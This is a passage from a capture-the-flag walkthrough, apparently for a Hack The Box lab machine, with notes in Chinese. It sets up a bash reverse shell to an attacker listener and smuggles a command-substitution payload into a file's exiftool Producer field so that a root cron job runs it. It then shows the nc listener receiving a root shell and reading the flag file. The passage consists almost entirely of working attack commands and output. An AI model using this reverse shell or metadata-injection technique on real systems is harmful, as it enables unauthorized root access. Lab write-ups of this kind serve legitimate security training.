bash -c 'bash -i >& /dev/tcp/10.10.14.2/6666 0>&1'
[email protected]:~/api/vendor/dompdf/dompdf/lib$ chmod +x reverse_shell.sh
在/tmp文件夹下创建test文件,更改创建者为执行反弹shell脚本的语句exiftool -Producer='a[$(/var/www/api/vendor/dompdf/dompdf/lib/reverse_shell.sh>&2)]+42' test,使用nc开启6666端口的监听。
[email protected]:/tmp$ touch test
[email protected]:/tmp$ exiftool -Producer='a[$(/var/www/api/vendor/dompdf/dompdf/lib/reverse_shell.sh>&2)]+42' test
1 image files updated
等待定时计划执行,在nc成功接收到root权限的shell,并获取到root.txt。
┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]
└─$ nc -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.72.208] 45822
bash: cannot set terminal process group (6164): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# cat root.txt
cat root.txt
657c064e22ad2b8fe23348af755061e6